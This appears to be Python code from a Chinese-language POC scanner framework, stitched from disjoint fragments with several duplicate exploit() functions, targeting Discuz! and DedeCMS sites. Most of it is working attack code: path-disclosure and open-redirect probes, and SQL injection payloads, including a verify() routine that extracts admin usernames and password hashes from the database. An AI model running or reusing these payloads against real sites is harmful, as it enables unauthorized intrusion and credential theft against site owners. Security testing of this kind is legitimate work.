def default(self):
"""
输入错误的选择项
:return:
"""
logger.error("[-] 无效的选项!")
print()
def emptychoice(self):
'''
输入为空
:return:
'''
logger.error('输入不能为空,请输入你的选择!')
print()
def exploit(url):
headers = {
"User-Agent":
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
payloads = [
"/uc_server/control/admin/db.php",
"/source/plugin/myrepeats/table/table_myrepeats.php",
"/install/include/install_lang.php"
]
try:
for payload in payloads:
vulnurl = url + payload
req = requests.get(vulnurl,
headers=headers,
timeout=10,
verify=False)
pattern = re.search(
'Fatal error.* in <b>([^<]+)</b> on line <b>(\d+)</b>',
req.text)
if pattern:
logger.success("[+]存在Discuz! X2.5 物理路径泄露漏洞...(低危)\tpayload: " +
vulnurl + "\tGet物理路径: " + pattern.group(1))
return vulnurl
except:
logger.error("[-] " + vulnurl + "====>连接超时")
def get_hash(url):
r = requests.get(url)
r.close()
try:
result = re.search(r"Duplicate entry \'(.*?)' for key",
r.content).group(1)
username = result.split("|")[1]
password = result.split("|")[2]
return (username, password)
except:
logger.error("Finish! Can't get hash!\nBut you can try it by hand!\n")
def do_use(self, plugin):
"""
加载插件
:param plugin: string, 插件名称
:return:
"""
if plugin:
try:
self.load_plugin(plugin)
except Exception:
logger.error("请输入正确的POC: %s" % plugin)
else:
logger.error("请输入POC插件(不能为空)")
def do_exploit(self):
"""
执行插件
:return:
"""
if self.current_plugin:
rn = self.exec_plugin()
if (rn == 'Cookie is required!'):
return ["", 'Cookie is required!', ""]
if not rn[0]:
logger.error(rn[1])
return rn
else:
logger.error("先选择一个POC插件")
def exploit(url):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
payload = "/data/mysql_error_trace.inc"
vulnurl = url + payload
try:
req = requests.get(vulnurl, headers=headers, timeout=10)
req.close()
if r"<?php exit()" in req.content:
logger.success("[+]存在dedecms trace爆路径漏洞...(信息)\tpayload: "+vulnurl)
return vulnurl
except:
logger.error("[-] "+vulnurl+"====>连接超时")
pass
def exploit(url):
headers = {
"User-Agent":
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
payload = "/plugin.php?id=nds_up_ques:nds_ques_viewanswer&srchtxt=1&orderby=dateline/**/And/**/1=(UpdateXml(1,ConCat(0x7e,Md5(1234)),1))--"
vulnurl = url + payload
try:
req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
if r"81dc9bdb52d04dc20036dbd8313ed05" in req.text:
logger.success("[+]存在discuz问卷调查参数orderby注入漏洞...(高危)\tpayload: " +
vulnurl)
return vulnurl
except:
logger.error("[-] " + vulnurl + "====>连接超时")
pass
def exploit(url):
headers = {
"User-Agent":
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
payload = "/plus/search.php?keyword=test&typeArr[%20uNion%20]=a"
vulnurl = url + payload
try:
req = requests.get(vulnurl, headers=headers, timeout=10)
req.close()
if r"Error infos" in req.content and r"Error sql" in req.content:
logger.success(
"[+]存在dedecms search.php SQL注入漏洞...(高危)\tpayload: " + vulnurl)
return vulnurl
except:
logger.error("[-] " + vulnurl + "====>连接超时")
pass
def exploit(url):
headers = {
"User-Agent":
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
payload = "/plus/download.php?open=1&link=aHR0cHM6Ly93d3cuYmFpZHUuY29t"
vulnurl = url + payload
try:
req = requests.get(vulnurl, headers=headers, timeout=10)
req.close()
if r"www.baidu.com" in req.content:
logger.success("[+]存在dedecms download.php重定向漏洞...(低危)\tpayload: " +
vulnurl)
return vulnurl
except:
logger.error("[-] " + vulnurl + "====>连接超时")
pass
def exploit(url):
headers = {
"User-Agent":
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
payload = "/data/admin/ver.txt"
vulnurl = url + payload
try:
req = requests.get(vulnurl, headers=headers, timeout=10)
req.close()
m = re.search("^(\d+)$", req.content)
if m:
logger.success("[+]探测到dedecms版本...(敏感信息)\t时间戳: %s, 版本信息: %s" %
(m.group(1), check_ver(m.group(1))))
return vulnurl
except:
logger.error("[-] " + vulnurl + "====>连接超时")
pass
def exploit(url):
headers = {
"User-Agent":
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
payload = "/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa%5c%27AnD+ChAr(@`%27`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,md5(1234),5,6,7,8,9%20FrOm%20`%23@__admin`%23"
vulnurl = url + payload
try:
req = requests.get(vulnurl, headers=headers, timeout=10)
req.close()
if r"81dc9bdb52d04dc20036dbd8313ed055" in req.content:
logger.success(
"[+]存在dedecms recommend.php SQL注入漏洞...(高危)\tpayload: " +
vulnurl)
return vulnurl
except:
logger.error("[-] " + vulnurl + "====>连接超时")
pass
def verify(URL):
r = requests.get(URL +
"/plus/search.php?keyword=as&typeArr[%20uNion%20]=a")
r.close()
if "Request Error step 1" in r.content:
logger.success("Step 1: Exploitable!")
result = get_hash(
URL +
"/plus/search.php?keyword=as&typeArr[111%3D@`\\\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\\\'`+]=a"
)
return result
elif "Request Error step 2" in r.content:
logger.success("Step 2: Exploitable!")
result = get_hash(
URL +
"/plus/search.php?keyword=as&typeArr[111%3D@`\\\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\\\'`+]=a"
)
return result
else:
logger.error("It's not exploitable!")
def do_options(self):
"""
插件设置项
:return:
"""
if self.current_plugin:
rn = self.show_options()
if isinstance(rn, str):
logger.error(rn)
else:
print("\n\t%-20s%-40s%-10s%s" %
("Name", "Current Setting", "Required", "Description"))
print("\t%-20s%-40s%-10s%s" %
("----", "---------------", "--------", "-----------"))
for option in rn:
print("\t%-20s%-40s%-10s%s" %
(option["Name"], option["Current Setting"],
option["Required"], option["Description"]))
print('\n')
else:
logger.error("Select a plugin first.")
def do_info(self, plugin):
"""
POC信息
:param plugin: string, 插件名称
:return:
"""
if not plugin:
if self.current_plugin:
plugin = self.current_plugin
else:
logger.error("请输入POC文件名")
return
if self.info_plugin(plugin):
name, author, cms, scope, description, reference = \
self.info_plugin(plugin)
print("\n%15s: %s" % ("Name", name))
print("%15s: %s" % ("CMS", cms))
print("%15s: %s\n" % ("Scope", scope))
print("Author:\n\t%s\n" % author)
print("Description:\n\t%s\n" % description)
print("Reference:\n\t%s\n" % reference)
else:
logger.error("无效文件名: %s" % plugin)
